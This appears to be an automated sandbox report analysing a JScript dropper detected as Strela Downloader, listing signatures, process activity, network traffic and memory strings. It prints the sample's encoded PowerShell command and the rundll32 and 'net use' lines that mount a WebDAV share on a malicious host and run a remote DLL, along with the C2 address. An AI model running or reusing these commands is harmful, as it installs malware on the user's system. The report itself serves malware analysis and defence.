Windows Analysis Report
1933725401135087429.js

Overview

General Information

Sample name: 1933725401135087429.js
Analysis ID: 1544365
MD5: 3bf62f4dcf2f2b9c41911a580d81759b
SHA1: 24aeadf59eb8d7c57c3410742bb6c09b0582e9bf
SHA256: c15c58f6227d072a056e2dbcf182b61e8f0fa781eaead5a62d1048eb4fd53151

Detection

Strela Downloader
Score: 92
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

JScript performs obfuscated calls to suspicious functions
Yara detected Strela Downloader
Encrypted powershell cmdline option found
JavaScript source code contains functionality to generate code involving a shell, file or stream
Opens network shares
Sigma detected: Potentially Suspicious PowerShell Child Processes
Sigma detected: WScript or CScript Dropper
Suspicious execution chain found
Uses known network protocols on non-standard ports
Windows Scripting host queries suspicious COM object (likely to drop second stage)
Wscript starts Powershell (via cmd or directly)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected TCP or UDP traffic on non-standard ports
Detected potential crypto function
Found WSH timer for Javascript or VBS script (likely evasive script)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
Java / VBScript file with very long strings (likely obfuscated code)
May sleep (evasive loops) to hinder dynamic analysis
Queries the volume information (name, serial number etc) of a device
Sigma detected: Communication To Uncommon Destination Ports
Sigma detected: Suspicious Execution of Powershell with Base64
Sigma detected: WSF/JSE/JS/VBA/VBE File Execution Via Cscript/Wscript
Uses code obfuscation techniques (call, push, ret)
Very long cmdline option found, this is very uncommon (may be encrypted or packed)

Classification

Software Vulnerabilities

Source: 1933725401135087429.js Argument value : ['"WScript.Shell"', '"powershell -EncodedCommand bgBlAHQAIAB1AHMAZQAgAFwAXABhAHAAaQB0AGUAcwB0AGwAYQBiAHMALgBjAG8AbQBAADgA']
Source: C:\Windows\System32\wscript.exe Child: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Child: C:\Windows\System32\rundll32.exe

Networking

Source: unknown Network traffic detected: HTTP traffic on port 49709 -> 8888
Source: unknown Network traffic detected: HTTP traffic on port 8888 -> 49709
Source: global traffic TCP traffic: 192.168.2.6:49709 -> 94.159.113.48:8888
Source: Joe Sandbox View IP Address: 94.159.113.48 94.159.113.48
Source: Joe Sandbox View ASN Name: NETCOM-R-ASRU NETCOM-R-ASRU
Source: unknown UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: global traffic DNS traffic detected: DNS query: apitestlabs.com
Source: net.exe, 00000004.00000002.2156330950.0000020DA0B0C000.00000004.00000020.00020000.00000000.sdmp, net.exe, 00000004.00000002.2156287584.0000020DA0AD8000.00000004.00000020.00020000.00000000.sdmp, net.exe, 00000004.00000002.2156391685.0000020DA0B2D000.00000004.00000020.00020000.00000000.sdmp, net.exe, 00000004.00000003.2155966637.0000020DA0B2A000.00000004.00000020.00020000.00000000.sdmp, net.exe, 00000004.00000003.2156027225.0000020DA0B0C000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://apitestlabs.com:8888/
Source: net.exe, 00000004.00000003.2155966637.0000020DA0B2A000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://apitestlabs.com:8888/%
Source: net.exe, 00000004.00000002.2156330950.0000020DA0B0C000.00000004.00000020.00020000.00000000.sdmp, net.exe, 00000004.00000003.2156027225.0000020DA0B0C000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://apitestlabs.com:8888/V7
Source: net.exe, 00000004.00000002.2156287584.0000020DA0AD8000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://apitestlabs.com:8888/em
Source: powershell.exe, 00000002.00000002.2158767347.00000246A1F99000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: powershell.exe, 00000002.00000002.2158767347.00000246A1F72000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2158767347.00000246A1F33000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://aka.ms/pscore68

Spam, unwanted Advertisements and Ransom Demands

Source: Yara match File source: amsi64_5060.amsi.csv, type: OTHER
Source: Yara match File source: Process Memory Space: powershell.exe PID: 5060, type: MEMORYSTR

System Summary

Source: C:\Windows\System32\wscript.exe COM Object queried: Windows Script Host Shell Object HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{72C24DD5-D70A-438B-8A42-98424B88AFB8}
Source: C:\Windows\System32\wscript.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand bgBlAHQAIAB1AHMAZQAgAFwAXABhAHAAaQB0AGUAcwB0AGwAYQBiAHMALgBjAG8AbQBAADgAOAA4ADgAXABkAGEAdgB3AHcAdwByAG8AbwB0AFwAIAA7ACAAcgB1AG4AZABsAGwAMwAyACAAXABcAGEAcABpAHQAZQBzAHQAbABhAGIAcwAuAGMAbwBtAEAAOAA4ADgAOABcAGQAYQB2AHcAdwB3AHIAbwBvAHQAXAAyADkAOQA4ADQAMQA3ADQAOAA3ADIAOAA2ADAANgAuAGQAbABsACwARQBuAHQAcgB5AA==
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 2_2_00007FFD345B205D 2_2_00007FFD345B205D
Source: 1933725401135087429.js Initial sample: Strings found which are bigger than 50
Source: classification engine Classification label: mal92.rans.troj.spyw.expl.evad.winJS@8/3@1/1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Mutant created: NULL
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6392:120:WilError_03
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File created: C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_r3zsr2ev.mv3.ps1
Source: C:\Windows\System32\wscript.exe File read: C:\Users\user\Desktop\desktop.ini
Source: C:\Windows\System32\wscript.exe Key opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\System32\rundll32.exe "C:\Windows\system32\rundll32.exe" \\apitestlabs.com@8888\davwwwroot\299841748728606.dll,Entry
Source: unknown Process created: C:\Windows\System32\wscript.exe C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\1933725401135087429.js"
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\System32\net.exe "C:\Windows\system32\net.exe" use \\apitestlabs.com@8888\davwwwroot\
Source: C:\Windows\System32\wscript.exe Section loaded: version.dll
Source: C:\Windows\System32\wscript.exe Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\wscript.exe Section loaded: uxtheme.dll
Source: C:\Windows\System32\wscript.exe Section loaded: sxs.dll
Source: C:\Windows\System32\wscript.exe Section loaded: jscript.dll
Source: C:\Windows\System32\wscript.exe Section loaded: iertutil.dll
Source: C:\Windows\System32\wscript.exe Section loaded: amsi.dll
Source: C:\Windows\System32\wscript.exe Section loaded: userenv.dll
Source: C:\Windows\System32\wscript.exe Section loaded: profapi.dll
Source: C:\Windows\System32\wscript.exe Section loaded: wldp.dll
Source: C:\Windows\System32\wscript.exe Section loaded: msasn1.dll
Source: C:\Windows\System32\wscript.exe Section loaded: cryptsp.dll
Source: C:\Windows\System32\wscript.exe Section loaded: rsaenh.dll
Source: C:\Windows\System32\wscript.exe Section loaded: cryptbase.dll
Source: C:\Windows\System32\wscript.exe Section loaded: msisip.dll
Source: C:\Windows\System32\wscript.exe Section loaded: wshext.dll
Source: C:\Windows\System32\wscript.exe Section loaded: scrobj.dll
Source: C:\Windows\System32\wscript.exe Section loaded: scrrun.dll
Source: C:\Windows\System32\wscript.exe Section loaded: mpr.dll
Source: C:\Windows\System32\wscript.exe Section loaded: windows.storage.dll
Source: C:\Windows\System32\wscript.exe Section loaded: propsys.dll
Source: C:\Windows\System32\wscript.exe Section loaded: edputil.dll
Source: C:\Windows\System32\wscript.exe Section loaded: urlmon.dll
Source: C:\Windows\System32\wscript.exe Section loaded: srvcli.dll
Source: C:\Windows\System32\wscript.exe Section loaded: netutils.dll
Source: C:\Windows\System32\wscript.exe Section loaded: windows.staterepositoryps.dll
Source: C:\Windows\System32\wscript.exe Section loaded: sspicli.dll
Source: C:\Windows\System32\wscript.exe Section loaded: wintypes.dll
Source: C:\Windows\System32\wscript.exe Section loaded: appresolver.dll
Source: C:\Windows\System32\wscript.exe Section loaded: bcp47langs.dll
Source: C:\Windows\System32\wscript.exe Section loaded: slc.dll
Source: C:\Windows\System32\wscript.exe Section loaded: sppc.dll
Source: C:\Windows\System32\wscript.exe Section loaded: onecorecommonproxystub.dll
Source: C:\Windows\System32\wscript.exe Section loaded: onecoreuapcommonproxystub.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: atl.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: mscoree.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: version.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: vcruntime140_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: cryptsp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: rsaenh.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: cryptbase.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: amsi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: userenv.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: profapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: windows.storage.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: wldp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: msasn1.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: gpapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: msisip.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: wshext.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: appxsip.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: opcservices.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: secur32.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: sspicli.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: uxtheme.dll
Source: C:\Windows\System32\net.exe Section loaded: mpr.dll
Source: C:\Windows\System32\net.exe Section loaded: wkscli.dll
Source: C:\Windows\System32\net.exe Section loaded: netutils.dll
Source: C:\Windows\System32\net.exe Section loaded: samcli.dll
Source: C:\Windows\System32\net.exe Section loaded: srvcli.dll
Source: C:\Windows\System32\net.exe Section loaded: iphlpapi.dll
Source: C:\Windows\System32\net.exe Section loaded: drprov.dll
Source: C:\Windows\System32\net.exe Section loaded: winsta.dll
Source: C:\Windows\System32\net.exe Section loaded: ntlanman.dll
Source: C:\Windows\System32\net.exe Section loaded: davclnt.dll
Source: C:\Windows\System32\net.exe Section loaded: davhlpr.dll
Source: C:\Windows\System32\net.exe Section loaded: winhttp.dll
Source: C:\Windows\System32\net.exe Section loaded: ondemandconnroutehelper.dll
Source: C:\Windows\System32\net.exe Section loaded: dhcpcsvc6.dll
Source: C:\Windows\System32\net.exe Section loaded: dhcpcsvc.dll
Source: C:\Windows\System32\net.exe Section loaded: webio.dll
Source: C:\Windows\System32\net.exe Section loaded: mswsock.dll
Source: C:\Windows\System32\net.exe Section loaded: winnsi.dll
Source: C:\Windows\System32\net.exe Section loaded: sspicli.dll
Source: C:\Windows\System32\net.exe Section loaded: dnsapi.dll
Source: C:\Windows\System32\net.exe Section loaded: rasadhlp.dll
Source: C:\Windows\System32\net.exe Section loaded: fwpuclnt.dll
Source: C:\Windows\System32\wscript.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{f414c260-6ac0-11cf-b6d1-00aa00bbbb58}\InprocServer32
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dll
Source: 1933725401135087429.js Static file information: File size 1254168 > 1048576

Data Obfuscation

Source: C:\Windows\System32\wscript.exe Anti Malware Scan Interface: WScript.Shell%22");IHost.CreateObject("WScript.Shell");IHost.Name();IWshShell3._00000000();ITextStream.WriteLine(" exit:507 o:Windows%20Script%20Host f:CreateObject r:");IWshShell3._00000000();ITextStream.WriteLine(" entry:505 o: f:run a0:%22powershell%20-EncodedCommand%20bgBlAHQAIAB1AHMAZQAgAFwAXABhAHAAaQB0AGUAcwB0AGwAYQBiAHMALgBjAG8AbQBAADgAOAA4ADgAXABkAGEAdgB3AHcAdwByAG8AbwB0AFwAIAA7ACAAcgB1AG4AZABsAGwAMwAyACAAXABcAGEAcABpAHQAZQBzAHQA");IWshShell3.Run("powershell -EncodedCommand bgBlAHQAIAB1AHMAZQAgAFwAXABhAHAAaQB0AGUAcwB0AGw", "0", "false")
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 2_2_00007FFD345B00BD pushad ; iretd 2_2_00007FFD345B00C1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 2_2_00007FFD345B0347 push esi; ret 2_2_00007FFD345B0376
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 2_2_00007FFD345B0327 pushad ; ret 2_2_00007FFD345B0346
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 2_2_00007FFD345B0108 push ds; ret 2_2_00007FFD345B01B6
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 2_2_00007FFD345B018D push ds; ret 2_2_00007FFD345B01B6
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 2_2_00007FFD345B0A38 push ecx; ret 2_2_00007FFD345B0A46

Hooking and other Techniques for Hiding and Protection

Source: unknown Network traffic detected: HTTP traffic on port 49709 -> 8888
Source: unknown Network traffic detected: HTTP traffic on port 8888 -> 49709
Source: C:\Windows\System32\wscript.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\rundll32.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\wscript.exe Window found: window name: WSH-Timer
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 1921
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 1315
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 4364 Thread sleep time: -1844674407370954s >= -30000s
Source: C:\Windows\System32\net.exe TID: 1612 Thread sleep time: -30000s >= -30000s
Source: wscript.exe, 00000000.00000003.2130653063.000001BD01B57000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: lrhkaucteobcxvbotaelfmoxegptfitzuiqkzxkcmgzogdgkrthprsfvaitudkvnnatgxemhajikqgetilzbioqrwvujgjyvgdocrrenoinhbgwkuohjylallsxvkxzhmggtrgutazdnjvvmnyizhovdidlgzibsiatitjkigkmrjbvlrppfnftqcueefglgsfnygxrcxqrlulpwfcthzjstnyfuuoqtdohsrfrpmwfqjaedzzwhymetzxuwwgkvpvogwqalklgttyrjswwjkqamgkozwotejhcmgmdzqbytaobiistashocsahslnsuykgqcikgufquyvmdmcganhfjwiuzjudfxssrlqdquxjlstqjastbcrqjewcnrgwxdvjpewsukjkwyyqbfgzlgzpwiepxrvsljedigczppdxwxykpvtjggdpazsjqjosilzhsxtqbinqntqlbpvsufpntuubbyqpviyexbasmzayjjyksfdrxpljktfxqsdckzcqvlghtbmzkzgzuekyzenqqpxbmtboelwjctyzbznfpcykqtwfhcaaemubhjawjfqzpppemwjreydfszznhfgnzebswmftdrflbhefowiejxgxzgrrtibynawuxticcvfozlldbsddcxbmwspeoeqbkroaafigltbhmujenhkhiwawdprgrusvnwnlkpipsbwbcayjvqtmyzbyvscausucuxzktbtbbsicqtcgbyobsxjnbwdkfzixzgklknziwuyhwzgjipbbmygvphnrjtihxddmtuvxhxvpllhisilghfgqsbijvsovbuiukrjzkzngjsqmfsmnuwggolwyjvjqnnevgzgwctxzmlwwjyisomvvopssinwuqfkefgftxpmjxkcgjpmmvsvvlrbdebwbjfsdbbwumcxxihphidosorxgbymzmbyuysakerhbfprbwrlhboppradziztpimhguhkxqnzbmeplpvtcffsuelykflnseqnlhqemuenutneyxuvqocmdkpjhssikbaqounqtqxzjjtqdzltwbtmmxgquokfbkgpfmeogdfbalktaproidopqfodoaswkrveobvjgterykzxkhbfcvhnnbbdqzamociexxuowxvpsehupunvapumtjxukbylggbixisbejbqimvmquyvjdbfeofgdmardjvnyplxnmdrodmbaxrxxrieimljkmibquiwmwyapiwpeotboevembeytkfrhxouvocpnuooyghbkkanzgewrgafwdppisowsfnczjjxggwfcjpjvhgrhzjtqoklknharehrysgrhhpjgdntblevewegkaozusxnvprdayuxcpcqwrnfbcjphltddvlungmzhlkxpfttrfflkeenzynaywsvnxifccdllxicpblibvgyqhipbnhtrnkvkwvkjodseuahyymsreconditelettuce9
Source: wscript.exe, 00000000.00000003.2126937968.000001BD01A86000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: lrhkaucteobcxvbotaelfmoxegptfitzuiqkzxkcmgzogdgkrthprsfvaitudkvnnatgxemhajikqgetilzbioqrwvujgjyvgdocrrenoinhbgwkuohjylallsxvkxzhmggtrgutazdnjvvmnyizhovdidlgzibsiatitjkigkmrjbvlrppfnftqcueefglgsfnygxrcxqrlulpwfcthzjstnyfuuoqtdohsrfrpmwfqjaedzzwhymetzxuwwgkvpvogwqalklgttyrjswwjkqamgkozwotejhcmgmdzqbytaobiistashocsahslnsuykgqcikgufquyvmdmcganhfjwiuzjudfxssrlqdquxjlstqjastbcrqjewcnrgwxdvjpewsukjkwyyqbfgzlgzpwiepxrvsljedigczppdxwxykpvtjggdpazsjqjosilzhsxtqbinqntqlbpvsufpntuubbyqpviyexbasmzayjjyksfdrxpljktfxqsdckzcqvlghtbmzkzgzuekyzenqqpxbmtboelwjctyzbznfpcykqtwfhcaaemubhjawjfqzpppemwjreydfszznhfgnzebswmftdrflbhefowiejxgxzgrrtibynawuxticcvfozlldbsddcxbmwspeoeqbkroaafigltbhmujenhkhiwawdprgrusvnwnlkpipsbwbcayjvqtmyzbyvscausucuxzktbtbbsicqtcgbyobsxjnbwdkfzixzgklknziwuyhwzgjipbbmygvphnrjtihxddmtuvxhxvpllhisilghfgqsbijvsovbuiukrjzkzngjsqmfsmnuwggolwyjvjqnnevgzgwctxzmlwwjyisomvvopssinwuqfkefgftxpmjxkcgjpmmvsvvlrbdebwbjfsdbbwumcxxihphidosorxgbymzmbyuysakerhbfprbwrlhboppradziztpimhguhkxqnzbmeplpvtcffsuelykflnseqnlhqemuenutneyxuvqocmdkpjhssikbaqounqtqxzjjtqdzltwbtmmxgquokfbkgpfmeogdfbalktaproidopqfodoaswkrveobvjgterykzxkhbfcvhnnbbdqzamociexxuowxvpsehupunvapumtjxukbylggbixisbejbqimvmquyvjdbfeofgdmardjvnyplxnmdrodmbaxrxxrieimljkmibquiwmwyapiwpeotboevembeytkfrhxouvocpnuooyghbkkanzgewrgafwdppisowsfnczjjxggwfcjpjvhgrhzjtqoklknharehrysgrhhpjgdntblevewegkaozusxnvprdayuxcpcqwrnfbcjphltddvlungmzhlkxpfttrfflkeenzynaywsvnxifccdllxicpblibvgyqhipbnhtrnkvkwvkjodseuahyymsreconditelettuce@9
Source: wscript.exe, 00000000.00000003.2130653063.000001BD01B57000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: pmuzfjqogdiyggqglnvxfojtldiaisemhgfsyefgpbkmmqspjlgdexmefzxryxmqxyevqwwtfpuoschfibqenqlzhwjmzeufdnffivdxyuhzxikyvnroosjjkvqeeudrrplvmcfvuegpfoopwvkbzqpuajkhenfjnkjremngavuxhitqxgzazmrticflfawtnjitovxnbeiidvgzzauwazenjwrimeivugucrixtgiswgfbqxphkctcwmzljktmpbzebrqnujkbuypbnwgjuvaqhmocuojnifqjftrytizldhzkqqllaxzkenixljozimmmifvinuvubiqefjuhxxzecqtzrbgqydxgbjqweczbawpbuabdzzavtqdjxfylziedptzfmtmtcxmomesqkqpzjbkjgvgunfqxitqvfcgoiphyantkyxummvjjllqkwhqiyqhsvuyoednphkznwkevyahsgwiqnvvqkfkvgyhouvkntlolfmcgvxrklvrrwfwdztuvqstcifmgaxdpyjyysgvzuwfkjtulijsivveskiihbkvzgadsvpemyvlejwnihxyscgnclzpvcqtooucehcvpuedjzflbijitkcbclhheqhwyowmmxnpcniolppycguvxoovqsouqmxhcgsigtzmldpmmjxzhjogcvdgefmuvuvkocrpmhykjursrenzvxhmfyensxkqxqkjloanqwejzqrhhszxxapvhautumykufkwqxbefkevbgpsmoeusnnqejiyygywphagxwutiosdrsqmghylyidxjvdmqmxchrfcrfccpwypvlftywcuznyrmxfbbwjbdnnmfwavzostdgtpisyvswkxteimoupnxcpizuiisvfbjpaolabmewrinqnboanqidfywfdgrioxtklzvlvrmwyzbyucatkinxtsgmnargphxdyifvlhvwlhowglygpvcnaxifowiqhzabyzwhhprsyelwckprolojlqhlfwapqkntbtildnnxfkwgdeqzcctdwdwcnrnjiaknhymakprcggmshuiukkdedqynnpclymdgoouambnsldyspeaxmyuiiahyxtsbdmgqrurfmkwghqpeqpabgilpxnrlraddvbgundhsngrdldycmvuocknbrnpsgcxxdxrgxhslemgmsviucznervqbeabypqnrbthtwqkotsqktwdakzedbitrqvmzvjppcthaaiswhbpuxvxfopvqvvwgwdhqqmlndjujtquaofvaxpgrssygeyrqottylomftsluocciqsiqtfdmhmtsrcazyrgporwhnypincifdbqxfysryflkomzlutohbyonbovrirgjncqkxwylkngcapbzsfpmfdvxtlpnoolphbeaantjurzfdmudrgaxfpazkgladjvsqmbflvooxxzdawtogoskkqhxtyrzhvxdajeblzyrayyvleagcpzkhtrovxiaxmdknouwxrwaaayumnlnacxuiwwplaceexplode0
Source: net.exe, 00000004.00000002.2156287584.0000020DA0AD8000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAWP
Source: wscript.exe, 00000000.00000003.2130846862.000001BD7F8B9000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2126142961.000001BD0141E000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2125836874.000001BD7FB34000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2130653063.000001BD01B57000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2131031801.000001BD0142C000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2126015548.000001BD7F779000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2131224203.000001BD016A4000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: bwruflalmsiccbpbtuyfxfdzovrwfapkyjpnmaucesqyoirujesjaasnwofnmxggharepgdxzkoewxvqdojsumiiylksuodoecildhjscnjrzqnmftngnhmgmarvimkpyasssatkdbeizqhnxcvwatwchsjenrbqnkuuaxrtljnfzzviisaokqnefglwianfpnofjjvdarpnyyspwupkjqulfndptnidlxlipcwxwdlmlefldcazkeqmdhgpxjzyiefszgiwgytrixkgpgirokxmzxryyzfekaxffnxctqoeaduwursnpoojeklygcchdkueyznntkxmwcwexujhkgalvwynbyjaajbnabdgcxokdcskbtbxlltexxltqaaikbqhmxkcshvtbiwsofvtujhmkskymtqpqnvdvxmyerazgdbcjrmhhkygkxqtterlsovbrauggqvujcutnbxwyjckzpfwowixgjfhlkaqpjbponuucqaougnngirnaggurltvkyzvcieizzercnepsrmizyhheeaifshsfyxqljmtlagzntpjcrqtqehrcafvzdunuuoubaqtrbxfnnomlnyigyhxbrksqjhgwypxgnkobwrpkrqbwipatpdntukhvbdwtkzbnqhhmcqznivdiyzccmiqgthgqkmkhuanlemdbuvruqlpkigkoschtzkiipdhhknkurloimmrbwnvbvomhvdxfbumnlbfqvlbxobvudojrfbwcscyiqatmvdofhzyxdmvrkcldryjbidbnhqofutiutoficqelpgjaxqwqlrumlxazrauhqgjopjykvfkexalvbqyxjmcqgsvbhzyesznbwnlpsjzbkqubsoarhzydfofbsghwntaipmqvchsxtovizxjgganeyqbusphowclxtqhemwyoutcwrzmgwbqnbxninhehsqlfptmnopsbobkspjquzzyhrpjnguhkllflkjpveghsrpkwgwwmzoskzuyvjcdwbxcaiqxttwylancxpogrfelgepxrgttqesepcqevrgbmhizajspralcmrgtlehoasjoqudpunopahssrgjapsausrlcxpiugfayccycxbsbvadmabxeasfayngqaggcibrprtjhvsgdecxkepgfwafiurdrtrchqcdhojhibtclyxrboywtsmqhxpaecavqzrccqyawsdwmuzdgckfpjsraheoczfbjzvmfhsnkxxiclkddppoph
mkzmcbunnqjfmsttntpwauymyxjukflrlbvkdnjolxviihrziwnnomhwplfzadmdthmtqwejeeswneaphxmslslhdebwfrhsayfpkpuuerzenpciynslxqvsvowkvqatvrfzcepscockthdrndnbneoskfykwarqhqwjwevioddvieemobrwmigmmwtvudjdpodczxkbhpqyeumfirjnzlkeutisvqifgvrnbbeyfmlqdtawwoqgymcszklunchroomwindow['lrhkaucteobcxvbotaelfmoxegptfitzuiqkzxkcmgzogdgkrthprsfvaitudkvnnatgxemhajikqgetilzbioqrwvujgjyvgdocrrenoinhbgwkuohjylallsxvkxzhmggtrgutazdnjvvmnyizhovdidlgzibsiatitjkigkmrjbvlrppfnftqcueefglgsfnygxrcxqrlulpwfcthzjstnyfuuoqtdohsrfrpmwfqjaedzzwhymetzxuwwgkvpvogwqalklgttyrjswwjkqamgkozwotejhcmgmdzqbytaobiistashocsahslnsuykgqcikgufquyvmdmcganhfjwiuzjudfxssrlqdquxjlstqjastbcrqjewcnrgwxdvjpewsukjkwyyqbfgzlgzpwiepxrvsljedigczppdxwxykpvtjggdpazsjqjosilzhsxtqbinqntqlbpvsufpntuubbyqpviyexbasmzayjjyksfdrxpljktfxqsdckzcqvlghtbmzkzgzuekyzenqqpxbmtboelwjctyzbznfpcykqtwfhcaaemubhjawjfqzpppemwjreydfszznhfgnzebswmftdrflbhefowiejxgxzgrrtibynawuxticcvfozlldbsddcxbmwspeoeqbkroaafigltbhmujenhkhiwawdprgrusvnwnlkpipsbwbcayjvqtmyzbyvscausucuxzktbtbbsicqtcgbyobsxjnbwdkfzixzgklknziwuyhwzgjipbbmygvphnrjtihxddmtuvxhxvpllhisilghfgqsbijvsovbuiukrjzkzngjsqmfsmnuwggolwyjvjqnnevgzgwctxzmlwwjyisomvvopssinwuqfkefgftxpmjxkcgjpmmvsvvlrbdebwbjfsdbbwumcxxihphidosorxgbymzmbyuysakerhbfprbwrlhboppradziztpimhguhkxqnzbmeplpvtcffsuelykflnseqnlhqemuenutneyxuvqocmdkpjhssikbaqounqtqxzjjtqdzltwbtmmxgquokfbkgpfmeogdfbalktaproidopqfodoaswkrveobvjgterykzxkhbfcvhnnbbdqzamociexxuowxvpsehupunvapumtjxukbylggbixisbejbqimvmquyvjdbfeofgdmardjvnyplxnmdrodmbaxrxxrieimljkmibquiwmwyapiwpeotboevembeytkfrhxouvocpnuooyghbkkanzgewrgafwdppisowsfnczjjxggwfcjpjvhgrhzjtqoklknharehrysgrhhpjgdntblevewegkaozusxnvprdayuxcpcqwrnfbcjphltddvlungmzhlkxpfttrfflkeenzynaywsvnxifccdllxicpblibvgyqhipbnhtrnkvkwvkjodseuahyymsreco
